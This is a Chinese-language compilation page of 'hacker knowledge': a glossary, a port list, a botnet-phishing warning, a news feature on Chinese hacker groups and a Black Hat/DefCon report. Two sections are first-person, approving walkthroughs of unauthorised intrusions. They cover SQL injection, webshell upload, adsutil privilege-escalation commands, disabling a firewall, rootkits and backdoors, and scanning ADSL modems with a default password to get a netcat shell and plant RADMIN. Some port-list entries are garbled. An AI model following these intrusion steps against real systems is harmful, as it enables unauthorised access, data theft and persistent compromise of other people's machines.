黑客知识2
1黑客英语
attack攻击
hacker黑客
exploit漏洞测试工具
Firlwall防火墙
Anti-Virus杀毒软件
Virus病毒
worm蠕虫
IDS入侵监测系统
security安全
tool工具
Trojan木马
DDOS拒绝服务攻击
sniffer嗅探,从网络中截取密码信息
sec-tool安全工具
SQL-injectionSQL注入,入侵网站常用
password密码
ID账号
Cracker破解,软件破解
File文件
Edit编辑
View查看
Open打开
Message消息
share共享
port端口
IP网络地址
Send发送
Select选择
Source资源
code代码
programming编程
WEB网站
ASP/PHP/JSP动态脚本语言.
NETFramework微软.NET框架
JAVA爪哇编程语言
Options配置
Connection连接
Proxy代理
Advanced高级
Start启动
Stop停止
Vmware虚拟机
Close关闭
Exit退出
2黑客英语99句
1tcpmuxTCPPortServiceMultiplexer传输控制协议端口服务多路开关选择器
2compressnetManagementUtilitycompressnet管理实用程序
3compressnetCompressionProcess压缩进程
5rjeRemoteJobEntry远程作业登录
7echoEcho回显
9discardDiscard丢弃
11systatActiveUsers在线用户
13daytimeDaytime时间
17qotdQuoteoftheDay每日引用
18mspMessageSendProtocol消息发送协议
19chargenCharacterGenerator字符发生器
20FTP-dataFileTransfer[DefaultData]文件传输协议(默认数据口)
21ftpFileTransfer[Control]文件传输协议(控制)
22sshSSHRemoteLoginProtocolSSH远程登录协议
23telnetTelnet终端仿真协议
24?anyprivatemailsystem预留给个人用邮件系统
25smtpSimpleMailTransfer简单邮件发送协议
27nsw-feNSWUserSystemFENSW用户系统现场工程师
29msg-icpMSGICPMSGICP
31msg-authMSGAuthenticationMSG验证
33dspDisplaySupportProtocol显示支持协议
35?anyprivateprinterserver预留给个人打印机服务
37timeTime时间
38rapRouteAccessProtocol路煞梦市?
39rlpResourceLocationProtocol资源定位协议
41graphicsGraphics图形
42nameserverWINSHostNameServerWINS主机名服务
43nicnameWhoIs‘绰号‘whois服务
44mpm-flagsMPMFLAGSProtocolMPM(消息处理模块)标志协议
45mpmMessageProcessingModule[recv]消息处理模块
46mpm-sndMPM[defaultsend]消息处理模块(默认发送口)
47ni-ftpNIFTPNIFTP
48auditdDigitalAuditDaemon数码音频后台服务
49tacacsLoginHostProtocol(TACACS)TACACS登录主机协议
50re-mail-ckRemoteMailCheckingProtocol远程邮件检查协议
51la-maintIMPLogicalAddressMaintenanceIMP(接口信息处理机)逻辑地址维护
52xns-timeXNSTimeProtocol施乐网络服务系统时间协议
53domainDomainNameServer域名服务器
54xns-chXNSClearinghouse施乐网络服务系统票据交换
55isi-glISIGraphicsLanguageISI图形语言
56xns-authXNSAuthentication施乐网络服务系统验证
57?anyprivateterminalaccess预留个人用终端访问
58xns-mailXNSMail施乐网络服务系统邮件
59?anyprivatefileservice预留个人文件服务
60?Unassigned未定义
61ni-mailNIMAILNI邮件?
62acasACAServices异步通讯适配器服务
63whois+whois+WHOIS+
64coviaCommunicationsIntegrator(CI)通讯接口
65tacacs-dsTACACS-DatabaseServiceTACACS数据库服务
66sql*netOracleSQL*NETOracleSQL*NET
67bootpsBootstrapProtocolServer引导程序协议服务端
68bootpcBootstrapProtocolClient引导程序协议客户端
69tftpTrivialFileTransfer小型文件传输协议
70gopherGopher信息检索协议
71netrjs-1RemoteJobService远程作业服务
72netrjs-2RemoteJobService远程作业服务
73netrjs-3RemoteJobService远程作业服务
74netrjs-4RemoteJobService远程作业服务
75?anyprivatedialoutservice预留给个人拨出服务
76deosDistributedExternalObjectStore分布式外部对象存储
77?anyprivateRJEservice预留给个人远程作业输入服务
78vettcpvettcp修正TCP?
79fingerFingerFINGER(查询远程主机在线用户等信息)
80httpWorldWideWebHTTP全球信息网超文本传输协议
81hosts2-nsHOSTS2NameServerHOST2名称服务
82xferXFERUtility传输实用程序
83mit-ml-devMITMLDevice模块化智能终端ML设备
84ctfCommonTraceFacility公用追踪设备
85mit-ml-devMITMLDevice模块化智能终端ML设备
86mfcobolMicroFocusCobolMicroFocusCobol编程语言
87?anyprivateterminallink预留给个人终端连接
88kerberosKerberosKerberros安全认证系统
89su-mit-tgSU/MITTelnetGatewaySU/MIT终端仿真网关
90dnsixDNSIXSecuritAttributeTokenMapDNSIX安全属性标记图
91mit-dovMITDoverSpoolerMITDover假脱机
92nppNetworkPrintingProtocol网络打印协议
93dcpDeviceControlProtocol设备控制协议
94objcallTivoliObjectDispatcherTivoli对象调度
95supdupSUPDUP
96dixieDIXIEProtocolSpecificationDIXIE协议规范
97swift-rvfSwiftRemoteVirturalFileProtocol快速远程虚拟文件协议
98tacnewsTACNewsTAC(东京大学自动计算机?)新闻协议
99metagramMetagramRelay
3黑客攻防实战之对有防火墙网站入侵过程
前几天群里的兄弟给了一个网站,问我可不可以入侵。
一、踩点
pingwww.111.com发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。
二、注入
从源文件里搜索关键字asp,找到了一个注入点。用nbsi注入,发现是sa口令登陆,去加了一个用户,显示命令完成。哈哈,看来管理员太粗心了。先上传一个webshell,上传了一个老兵的asp木马。接下来的就是个人习惯了,我平时入侵的习惯是先上传webshell,然后再把webshell提升为system权限。因为这样说可以说在入侵之时会非常的方便,我个人觉得这个方法非常好。
三、提升权限
先看哪些特权的:
cscriptC:InetpubAdminScriptsadsutil.vbsget/W3SVC/InProcessIsapiApps
得到:
Microsoft(R)Windows脚本宿主版本5.1forWindows
版权所有(C)MicrosoftCorporation1996-1999.Allrightsreserved.
InProcessIsapiApps:(LIST)(5Items)
‘C:WINNTsystem32idq.dll‘
‘C:WINNTsystem32inetsrvhttpext.dll‘
‘C:WINNTsystem32inetsrvhttpodbc.dll‘
‘C:WINNTsystem32inetsrvssinc.dll‘
‘C:WINNTsystem32msw3prt.dll‘
把asp.dll加进去:
cscriptC:InetpubAdminScriptsadsutil.vbs
set/W3SVC/InProcessIsapiApps‘C:WINNTsystem32idq.dll‘‘C:WINNTsystem32
inetsrvhttpext.dll‘‘C:WINNTsystem32inetsrvhttpodbc.dll‘‘C:WINNTsystem32
inetsrvssinc.dll‘‘C:WINNTsystem32msw3prt.dll‘‘c:winntsystem32
inetsrvasp.dll‘
然后用asp木马加个用户,显示命令完成。
四、TerminalService
接下来就是开3389了,用netstart显示,发现已开了TS服务,但端口上没有3389,觉得可能是改端口了。但事实上它们欺骗我的感情,我用netstat-an察看了一下,发现有3389,再从netstart里发现是对方的防火墙搞的鬼。算了,上传个木马吧,上传了一个改了特征码的20CN反弹木马,然后用木马在GUI下关掉了防火墙,再用3389登陆器登了上去,这里我这样做是因为我知道管理员一定不会在旁边。而对于这个时候,比较老道的方法大家可以用fpipe实现端口重定向,或者用httptunnel。和黑防里面说的那样,不过我试过没有成功过一次,而且我在收集资料里看到黑防的那篇和另外一个高手写的一模一样,不知道谁抄谁。还有一种工具是despoxy,(TCPtunnelforHTTPProxies)大家有兴趣的话可以去试一下,它可以穿透http代理。
五、简单后门
1.改了FSO名,这样是让我自己享受,这个有system权限的马儿。
2.放了几个rootkit和几个网络上少见的后台。
3.我个从是不喜欢多放后台,觉得很烦。
六、Sniffer
1.TS界面下,下载了些嗅探器。先ARPsniffer图形的看了一下,晕死,没有一台内网机子。又看了一个外网,晕死,整个IP段都是。看来我的运行不错嘛,打开webdavscan查了一下,只有两三个IP是网站,而且是很小型的,接下来就没有什么动力了。
4黑客如何穿透ADSL路由入侵内网
也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对ADSLMODEM的路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透ADSL路由入侵内网的方法,在这里和各位一起分享我的心得。
一.扫描
现在很多ADSLMODEM都是通过80、23、21三个端口来管理,但80、21端口有很多服务器都有打开,没什么特征性,于是我选择了23端口。打开我的至爱:SUPPERSCAN,填上我所在地区的IP段,(跨多几段都没关系,反正SUPPERSCAN的速度就是快)眨眼间,结果出来了。开23的主机还真不少,我挑了几台出来,在浏览器那里输入IP:218.xxx.xxx.xxx,OK。登陆对话框出来了,输入USER:ADSLpass:adsl1234(因为我这里的adslmodem一般是华硕的,缺省是adsladsl1234),好了,一矢中的,现在我就是上帝。
二.映射
入侵已经成功了一半,要进一步入侵内网,我门要进行端口映射,但是我连内网的拓扑都不知道(更不用说内网主机的端口开放情况了)又怎么映射呢?在此,我选择了猜测。一般来说,MODEM的内网IP缺省是192.168.1.1,而大多数就把自己主机的IP设成192.168.1.2。因此我们只要试试把192.168.1.2的端口映射出来就行了(但如果使用了dhcp就麻烦了)但是192.168.1.2到底开放了什么端口,我们根本就不知道啊。呵呵,既然不知道,那么我就把他整台主机透明地映射到外网。具体做法如下:进入NAT选项——添加NAT规则——BAMID——填入主机IP:192.168.1.2,到此192.168.1.2已经透明地映射到192.168.1.1上,我们访问ADSLMODEM就等于访问主机192.168.1.2了。
三.检测漏洞
现在我们再请出SUPPERSCAN对218.xxx.xxx.xxx进行扫描,呵,看到没有?扫描结果已经不同了,开放的端口是139、1433等,刚才只是开放了80、23、21而已(也就是说我们的映射已经成功了)该是X-SCAN出手了,用它来扫弱口令最好不过了,但扫描的结果令人失望,一个弱口令也没有,看来管理员还不算低啊。
四.溢出
既然没有弱口令,也没开80,那只好从逸出方面着手了,但没开80、21也就webdav.sevr-u的溢出没戏了,很自然,我向导了RPC溢出,但实践证明RPC溢出也是不行的,LSASS溢出也不行
五.募然回首,那人却在,灯火阑珊处
看来这个管理员还是比较负责的,该打的补丁都打上了。这时侯,我的目光转移到1433上了(嘿,不知道他打了SQL补丁没有?,心动不如行动,现在只好死马当活马医了,于是:
nc-v-l99sql2218.xxx.xxx.xxx0218.xxx.xxx.xxx99
这样就成功得到一个shell了。
六.设置后门
到这里,我们的入侵已经成功了,余下的是扫尾留后门,至于后门,我一般都是用FTP上传RADMIN上去的,呵呵,这里不详谈了,相信各位都知道。
5黑客利用伪造邮件构建僵尸网络
什么是僵尸网络?
僵尸网络是指采用一种或多种传播手段,将大量主机感染bot程序(僵尸程序),从而在控制者和被感染主机之间所形成的一个可一对多控制的网络。在Botnet的概念中有这样几个关键词。“bot程序”是robot的缩写,是指实现恶意控制功能的程序代码;“僵尸计算机”就是被植入bot的计算机;“控制服务器(ControlServer)”是指控制和通信的中心服务器。
僵尸网络首先是一个可控制的网络,这个网络并不是指物理意义上具有拓扑结构的网络,它具有一定的分布性,随着bot程序的不断传播而不断有新位置的僵尸计算机添加到这个网络中来。其次,这个网络是采用了一定的恶意传播手段形成的,例如主动漏洞攻击,邮件病毒等各种病毒与蠕虫的传播手段,都可以用来进行Botnet的传播,从这个意义上讲,恶意程序bot也是一种病毒或蠕虫。最后一点,也是僵尸网络的最主要的特点,就是可以一对多地执行相同的恶意行为,比如可以同时对某目标网站进行分布式拒绝服务(DDos)攻击,同时发送大量的垃圾邮件等,而正是这种一对多的控制关系,使得攻击者能够以极低的代价高效地控制大量的资源为其服务,这也是Botnet攻击模式近年来受到黑客青睐的根本原因。在执行恶意行为的时候,Botnet充当了一个攻击平台的角色,这也就使得Botnet不同于简单的病毒和蠕虫,也与通常意义的木马有所不同。
黑客如何利用补丁邮件?
目前,有黑客利用伪造的微软补丁邮件构建僵尸网络,因此请广大的网民确认收到的有关于微软补丁的邮件,并弄清楚您到底下载了什么到自己的计算机中。互联网风暴中心(InternetStormCenter)指出,黑客正在基于微软的安全更新伪造恶意电子邮件,这种伪造的邮件不能给用户提供任何有用的安全补丁,而实际上在邮件提供的链接或者附件中包含了恶意代码,那些没有警惕性的用户在点击了这些链接后即下载了恶意程序到自己的主机中。
实际上,对微软的安全补丁稍微留意的用户就会知道,微软是从来不会通过电子邮件的形式来通告用户安装安全更新补丁的,微软都是以安全公告的形式在其安全中心主页上(
http://www.microsoft.com/china/technet/security/default.mspx)发布安全信息的。通过这种伪造的邮件中,以安全补丁下载到的应用程序,实际上是一个后门木马,即在上面提到的bot程序。受这种木马影响的机器,将会被黑客远程的控制,受影响的机器至此就加入了僵尸网络。伪造邮件的黑客非常聪明,他们在受害者的姓名或者公司的名字里加入超级链接,链接到木马程序。到目前为止,安全研究人员已经发现了4种均是指向木马程序的不同的URL地址。在黑客伪造的邮件中,其中有封信的原文如下:
“由于您使用了微软的软件而收到这封邮件,我们是通过你提交给‘微软Windows更新’的邮件列表中
获得您的电子邮件地址的。一个0day漏洞(未公布的漏洞)已经在网络上流传开来,该漏洞将影响那些
使用MICROSOFTOUTLOOK的用户。成功利用该漏洞后,黑客能够完全控制您的机器。
(此处是一个补丁的链接地址)”
当大家收到类似的E-mail时,请提高警惕。处在,网络安全事件四起的今天,请广大的网民一定要注意自身的计算机安全。
6“中国黑客”10年嬗变
“熊猫烧香”在网络上猖狂,不少网络用户被染上病毒,网络安全在次敲响警钟。刘军/图
刺刀还在,理想已经滑落——“中国黑客”10年嬗变
作者:南方周末记者朱红军实习生李响发自上海
在中国短暂而一度喧嚣的黑客历史上,几乎从没有过纯粹的时光,它一再被捆绑和裹胁,最先是爱国精神,然后是商业利益,现在则几成犯罪的代名词
六年前,“中国鹰盟”成立之初,黑客万涛吟咏着“我们要做民族的精英,我们会永远战斗不息”,他的经典台词是为刺刀装上理想,像拿破仑的军队那样。
现在,2007年9月11日,远在成都出差的中年白领,惦记着夜晚的宵夜,然后悲哀地承认,如今的黑客圈是“名利场和大染缸”,他宁愿选择“永远缅怀”。
龚蔚,十年前成立中国第一个黑客组织——“绿色兵团”,如今甚至都已不愿轻言往事,“那是一段成长的历史”,他说自己反思过,检讨过,再无重温的激情,江湖也早无goodwell(网名)。
尽管源于上世纪60年代美国的“黑客”(Hacker)一词,最初的含义只关乎技术,指那些尽力挖掘计算机程序的最大潜力的电脑精英,但在中国短暂而一度喧嚣的黑客历史上,几乎从没有过纯粹的时光,它一再被捆绑和裹胁,最先是爱国精神,然后是商业利益,现在则几成犯罪的代名词。
“当你企图用文化去解构技术,它也许会发展成科学,也许会发展成巫术。”老牌黑客alert7说。
十年回首,那些曾经公开宣扬爱国,并在印尼排华、中美撞机等一系列历史事件中成功实施跨国网络攻击的黑客组织们,譬如绿色兵团、中国黑客联盟、红客联盟,大多风云流散,或者名存实亡。
当年的黑客教父,要么在商业的泥潭里泥足深陷,要么已悄然归隐,取而代之的是汹汹而来的以牟利为动机的新一代伪黑客、骇客们,以及日益攀升的有关黑客犯罪的冰冷数据。
这就是残酷的现实,正如万涛所说,刺刀还在,思想已经滑落。
那绿色和平的家园!
在世界头号黑客凯文·米特尼克因为非法侵入政府网站而入狱整整两年后,中国才诞生了第一个真正意义上的黑客组织。
1997年,上海黑客龚蔚(goodwell)在境外某网站申请了一处免费空间并在国内做了镜像站点,用于黑客之间的交流,成立“绿色兵团”。
发起人龚蔚如今的解释是,一切出于爱好和兴趣,当然还有同道切磋比拼的快感。“与利益无关,与政治无关”。
绿色兵团的名字,来源于他美好的梦想,“以兵团一般的纪律和规则,打造绿色和平的网络世界”。
1998年仅一年,阵容便趋于鼎盛,龚蔚回忆说,注册人数不下5000人,核心团队有一百多人,分布在湖南、福建、广东、北京、上海各地,这包括如今已被尊称为教父级的rocky、solo、小鱼儿、冰河、小榕、谢朝霞等等。
彼时的中国互联网还在起步间,对于普通人还是个陌生的名词,商业利益无从谈起,这得以令一帮沉醉于挑战技术的网络爱好者,纯净地栖居。
他们中一些是二十出头的大学生,初衷简单,甚至没有自己的电脑,有时为了争夺校园实验室里的机位而废寝忘食。
他们信守自己的黑客准则,甚至崇拜雷锋,主张网络技术共享、互助,耻于随意的攻击,遑论以之牟利?
绿色兵团的早期成员冰河(glacier)说,完全是靠自己的兴趣和网友的鼓励,才写出了中国最早的特洛伊木马程序,他最初只是想编写一个方便自己的远程控制软件。从不曾想竟成为之后中国最受诟病的黑客攻击软件。
后来的黑客组织“第八军团”的陈三公子,当时还只是个“菜鸟”,他说,黑客有黑客自己的行为准则,有自己的道德规范,正义、平等、共享、互助,“这是一种追求卓越和完美的精神”。
红客,民族的红色!
纯净的时光总是倏忽而逝,绿色兵团一位早期黑客现在说,再也不会回来了。
1998年5月,印度尼西亚发生排华事件。正蹒跚学步的中国黑客们决定声援,并向印尼网站发起攻击。这成全了他们第一次在公共视野的亮相,并且携爱国义举一呼百应。
组织者绿色兵团名噪一时,年轻的黑客们初尝被视为民族英雄的自豪。
当年的组织者龚蔚现在承认,一是民族情绪使然,再则不排除年轻人的出名冲动。
如今,谢朝霞甚至说,当时受了鼓动——鼓动显然不是褒义词。他行事低调,百般推辞采访,并拒谈任何个人情况。
最初江湖规则,尚被遵守,“我们留真名,只为表明我们的态度,不去窃取资料,也不恶意破坏对方设备。”龚蔚说。
朴素的爱国情绪造就了中国黑客最初的团结与坚强的精神,甚至出现了“中国黑客紧急会议中心”,负责对外国网站攻击期间的协调工作。
之后便是1999年的北约轰炸中国大使馆,中国黑客又一次大规模地团结起来,纷纷开展了对美国网站的攻击。在中国大使馆被炸后的第二天,第一个中国红客网站,“中国红客之祖国团结阵2001年,中美黑客大战,8万中国黑客一起行动,使中国红旗在美国白宫网站飘扬两个小时。他们自称“卫国战争”。
中国红客联盟、中国鹰派联盟、中国黑客联盟三大黑客组织成为这场中美黑客大战的主力军。一时间,红盟的lion、鹰派的万涛成为中国黑客英雄。
前者宣扬红客精神,给自己起了个独特的名字——“红客”?(Honker),希望以政治立场的正义性来证实自己攻击行为的合法性。
真实动机的揣测已经不重要,客观上,对于民族情绪的附庸,以及爱国旗帜的高扬,促成了中国黑客的急速成长。2000年的街头,黑客技术就像今天的blog(博客)一样流行。“报效祖国”成为年轻触网者最惯常的口头禅。
2002年4月,中国互联网协会公告制止有组织的攻击行为。红盟至此一蹶不振,只沦为少人问津的网页。而滔滔直下的网络安全产业,令昔日的黑客们竞相转型,别无他顾。
“在根本意义上,网络黑客所采取的手段和大学生对美国大使馆扔石头和墨水瓶没有什么两样,只是一种宣泄的手段。”中国社科院教授闵大洪曾一针见血地评价。
“时代变了,环境变了,网络也变了,”绿色兵团当年一成员感慨红色激情转瞬即逝的原因,“黑客又怎么能不变?”
大规模的以民族主义为名的攻击再难开展。2004年最后一天,中国红客联盟首领Lion宣布闭站,闵大洪教授撰文宣告告别中国黑客的激情时代。
商业迷梦
纯技术的理想也好,爱国的激情也罢,结果证明,在网络泡沫泛起、创业诱惑迭现的2000年前后,中国的黑客们变得脆弱。原本隐秘的江湖,出于商业的需要,也不可避免地驶向浮华和炫耀。
“回到现实,黑客们也是普通人,也需要吃饭,生活和个人发展。”早期绿色兵团的成员周帅不主张道德评价。
而第八军团的组织者陈三公子至今仍坚持,“合法地利用黑客技术,将它转化为合法的商业价值,我相信这也许就是众多黑客们体现自己价值的最高境界。”
1998年始出现的一系列的攻击行动,客观上也提醒了国人对于网络安全的认识,网络安全行业方兴未艾。
1999年,中国最早也是一度最强大的黑客组织绿色兵团纵身转型,脱胎为中绿联盟,当年7月成立了上海绿盟计算机网络安全技术有限公司。
随后,中国第一代黑客们纷纷扔掉利剑,举起盾牌,成群结队向网络安全领域进军。
“当时中国最顶尖的黑客人才,90%变身为了网络安全专家。”龚蔚说。
这些黑客教父昔日轻而易举地以爱国、民族旗帜一举成名,却不想,在商业的泥潭里,泥足深陷。
商业的迷梦,只消一年便告完结。2000年,上海绿盟即告解散。
龚蔚现在似乎有些后悔,绿色兵团风云四散,不仅仅是个人利益得失,更重要的,他以为,打开了商业资本的魔盒,终于侵蚀了本该纯净的黑客理念。而他被视为那个打开潘多拉魔盒的人。
周帅似乎显得早有预见,他说,自己从没有向网络安全领域迈进一步。
绿盟的失败,被如今的当事人解释为,尊奉的黑客自由理念与商业资本产生了冲突,这可能包括“网络安全公司赢利迫切,名为防卫,但难免要做一些攻击行动,打着法律的擦边球,以求业务的提升”。
不能容忍者选择逃离,而被资本俘获的却可能是大多数。
而另一部分人,比如万涛在寻找着其他可能,2002年他通过媒体回应当时的广东省长,中国黑客愿为政府服务。他曾经多么郑重地呼吁黑客的责任意识,甚至用上了最流行的“中国特色”的前缀。只可惜,未得实质回应。
“中国黑客的大联盟时代已经过去,现在是一盘散沙。”周帅说。
回头太难
网络的普及速度,比想象中要快,而黑客繁衍的速度或许比网络普及的速度还要快。
当黑客工具可以如此直接地带来商业利益,可以视为一种产品创造经济数据的时候,精英小众化的面纱便不复存在。
2000年之后,中国的所谓黑客队伍迅速扩大,众多唾手可得的黑客工具与软件使得进入黑客的门槛越来越低,网络间随处是黑客速成培训班,当300元钱就可以攻破一个邮箱,换回一套傻瓜黑客工具时,混乱已经无法避免。
甚至当年的黑客对这个称谓也惟恐避之不及,“太复杂了”是紧跟的喟叹。
龚蔚回过头来要重新捍卫作为黑客的纯洁性。万涛说,黑客应该是有道义、有良知的技术高手,他与骇客的区别是在进入别人的计算机以后,一个是善意提醒或悄然离开,而另一个则大肆破坏。
“这就好比一个人学会了武功,在没有打人之前,你不能说他是个坏人。如果他用来除暴安良,他就是侠,如果他用来打家劫舍,那他就是盗。”
还有人偶尔会说起红客,一个曾经以民族、爱国立身的词汇,据说Lion又重新开起了红客联盟,可惜悄无声息的网站上,他自己都一个月没有登陆了。熟悉他的朋友说,他活得很滋润。
再比如另一个“大红客联盟”,实际上只是一个代号了,他操心的是自己十几人的安全公司,甚至一将黑客与国家利益联系在一起,他本能地会问,“不敏感吗?”
更多的对于民族主义渲染,已经悄然变成了黑客网站揽钱广告上的一句经典台词,“一个月包会攻击日本电脑”。
陈三公子说,现在只有极少数仍然坚持黑客本色,默默地专注于技术研究,而另一部分闹得沸沸扬扬,其实是专注于商业利益。他亦曾被如此揣度。
“他们不是以技术为目的,而是以金钱为目的,他们在扭曲了黑客的同时,亦为社会埋下了众多不安全隐患。”
万涛说,看多了打着爱国幌子招摇撞骗的黑客,他最后的结论很悲伤,“和娱乐圈里的明星一样,绯闻是其花絮,注意力、快感和财富是其最终的归宿。”
龚蔚觉得,黑客世风日下,绿色兵团甚至难辞其咎,因为他们的失身下海,才造成了黑客精神被割断。他孜孜以求想建立一个大基金会,不涉网络相关的运作,重新回归到“绿色和平的网络世界”,“goodwell,不应该只属于一个人”。
他自己并不清楚,还有谁会放弃名利,愿意回归,也偶尔会觉得幼稚,但“总得试试吧”。
7从全球两大黑客年会看攻击趋势
要认识现今黑客功力,每年7月陆续在美国举办的全球两大黑客活动──黑帽大会(BlackHat)与Defcon,就是见识顶尖黑客大显身手的好时刻。今年会议上,黑客们不仅试图入侵现场ATM提款机、无线网络装置,亦探讨网络安全、NAC安全性、后门程序入侵及VoIP与行动装置等安全议题。
鉴识工具不是万能
企业被黑客入侵后,重要的是必须要能够追踪黑客的踪迹,并做好数字证据的保留与鉴识工作,进一步做为法庭的呈堂证供。因此,常用的数字鉴识工具,多是以稳定著称。这一次在黑帽大会上,便有研究单位iSec的研究员宣称,已经针对目前政府部门和警政单位常用的EnCase鉴识工具,进行反鉴识工具的研究。
此次是第三次参加黑帽大会和DefCon的中华电信数据分公司资安办公室技术研发组组长李伦铨,也对这一场技术论坛印象深刻。他进一步指出,iSec其实就是利用鉴识工具本身的软件漏洞,将可能造成鉴识结果失效或错误。「虽然这项研究结果,已经遭到鉴识工具厂商的驳斥,但能够做出这样的心得分享,必须累积长时间的资安研究能量,」李伦诠说,这也是目前台湾包括资安厂商和黑客组织在内,共同面临资安研究人才断层的问题。
找漏洞的套装工具渐齐全
资安问题大致可分成两类,一类是系统内部,例如Rootkit隐藏的问题;另外一种是新弱点、漏洞的发现,可透过逆向工程或Fuzzy手法,找出问题所在。此次黑帽大会上,行政院研考会技术服务中心(简称技服中心)工程师方家庆、陈鸿吉,两人不约而同看到,以往找漏洞的工具,有逐渐变成套装工具的趋势。
专精Rootkit研究的方家庆观察到,「不论是黑帽大会或是DefCon,利用Fuzzy手法找出软件漏洞,在今年看来已经成熟,」已有厂商开发一套架构,将Fuzzy常用组件整合成产品,可针对不同软件找漏洞。
擅长逆向工程的陈鸿吉,在黑帽大会上则观察到,透过逆向工程手法找寻软件漏洞,仍是破解软件的方式,已有厂商开发出,同时整合逆向工程与Fuzzy手法、协助分析的软件工具。这也意味着,这类型软件工具有走向整合性的趋势。
无线网络依然不安全
无线网络的便利造成普及,但相对的,其安全性,依然是最痛。不论是黑帽大会或是DefCon,现场其实都有提供无线网络的服务,由于参加两大黑客会议的成员,多数具有相关技术底子,但对于会场提供无线网络的安全性,依旧充满不信任感。
最明显的例子就是,在DefCon现场展示的「绵羊墙(WallofSheep)」。数联资安技术处经理杨伯瀚指出,绵羊墙就是在DefCon会场上,以部分马赛克方式,将监听到的账号、密码投射在这面绵羊墙上。「这也证明,无线网络的确仍有很高的风险性,」杨伯瀚说。
除了绵羊墙外,由黑客组织Chroot自行组队参加DefCon的成员曾信田(NewBug)则指出,此次同行的团员中,便有一名无线网络的真实受骇者。他进一步表示,团员DM一到DefCon现场,刚把CHT9100手机打开,就遭到现场黑客入侵,系统画面被置换。曾信田笑说,「DefCon现场网络环境的险恶,由此可知。」
NAC可用P2P手法破解
今年DefCon仍很重视Web本身的漏洞,不论是新的SQLInjection(SQL注入攻击)手法,或者是Web软件的新弱点、新的网站检测工具,甚至是利用社交工程手法,进一步做到XSS(跨站脚本)攻击,都是很明显的趋势,其中在会场示范的MySpace攻击,就是最好的例证。其它的,除了VoIP以及行动装置的安全性,各种后门程序植入手法与Vista安全性,也都是关切议题。
不过,许多资安厂商推动相当热烈的NAC(网络存取控管),向来被认为可以有效遏止企业资安环境的恶化,并落实企业资安政策。但杨伯瀚发现,此次有演讲者透过P2P技巧(以TOR为主),躲过防火墙的侦测。他进一步指出,这样的手法,以往常用于中国大陆网友,是一种可以躲避中国官方网络箝制的技巧,一山还有一山高,原本单纯躲避政府侦察的技巧,也成为黑客可用来躲避NAC的新手法。
Google在黑帽大会现场征才
型态较为严肃的黑帽大会,受邀对象或参展厂商,多数较为正式,而软件厂商Google也首度在黑帽大会摆摊位参展。不过,Google参展不是为了推销产品,「是为了在黑帽大会,网罗优秀的资安人才,」李伦铨说道。
Google传单中人才招募需求,其中有一项需求颇耐人寻味,「CISSPnotrequired。Relevantexperiencemustbehands-on!」李伦铨指出,从Google征才的条件发现,「Google要的不是会考试、有证书的人才,实务经验才是王道。」李伦铨说,这也意味着,专业黑客的手法与攻击变形,已经让许多擅长「说明攻击」而非「实作攻击」的嘴炮型黑客,招架不住。
现场领略信息战的威力
DefCon是一个囊括资通安全、实体安全及电子学等泛安全的聚会,像是实体安全上的开锁教学和比赛;或者是设计枪靶,看哪一把由计算机控制的玩具枪、BB弹,射击率最精准等,则运用大量的电子学。
杨伯瀚在现场,第一次感受到「信息战」的威力。此次有一名协助爱沙尼亚共和国做数字鉴识的演讲者,便还原该国遭到俄罗斯黑客攻击的真实状况。波罗的海三小国的爱沙尼亚,1991年从苏联独立出来,是一个信息化程度相当深的国家,网络银行相当普遍,「连买菜,都可以在网络上进行,」杨伯瀚转述说道。但爱沙尼亚与俄罗斯之间,有严重的政治冲突,先前有俄罗斯黑客号召俄国网友,针对爱沙尼亚重要的网络服务与网站等,发动DDoS(分布式阻断式服务)攻击。
爱沙尼亚虽然有国家级的防火墙,但从俄罗斯来的大量DoS攻击,仍瘫痪了爱沙尼亚的国家运作。为了恢复国家运作,爱沙尼亚中断所有从国外到该国的联机,启动国家级第二线备援线路,慢慢恢复基本国家运作机制;同时向欧盟、俄罗斯与美国的CERT求援,并协助进行事后的数字鉴识。杨伯瀚说,「如果台湾遭遇到类似的网络攻击,相关部门,是否有足够能力可以应付呢?」
ATM岌岌可危,WarGame高手云集
不论是黑帽大会或者是DefCon,此次台湾参加的成员,也有观察到一些有趣的场边花絮。技服中心工程师陈鸿吉在黑帽大会上,刚好遇到有一小群黑客,企图针对会场的自动柜员机(ATM)进行攻击,ATM甚至已经出现微软的画面,也出现一些命令列等,只不过,在现场警卫的干预下,这样的攻击手法没有完成。随着有越来越多银行ATM为了提供更多元的服务但,从专属系统陆续改成开放式的Windows-Based的ATM,「这也让人对于ATM的安全性,捏了一把冷汗。」陈鸿吉说。
DefCon另外的特色就是有WarGame以及各式各样有趣的现场活动。台湾黑客组织Chroot原本有意自行组队参加DefCon,但在会前赛中只取前13名,整体成绩名列第十四名Chroot与比赛机会擦身而过。但曾信田到DefCon现场发现,每一个入围WarGam队伍,所有的设备,包含服务器、网络设备等,都带得非常齐全,「如果Chroot有入围,在缺乏好的工具情况下,可能会被其它参赛队伍打着玩。」他说这一面绵羊墙,就是DefCon会场所有被监听到的账号、密码,都被投影在这面墙上Chroot黑客组织成员DM,一到DefCon现场,CHT9100手机一开机,就被现场黑客入侵、画面被置换。
更多完整内容阅读登陆
《墨缘文学网,https://wap.mywenxue.org》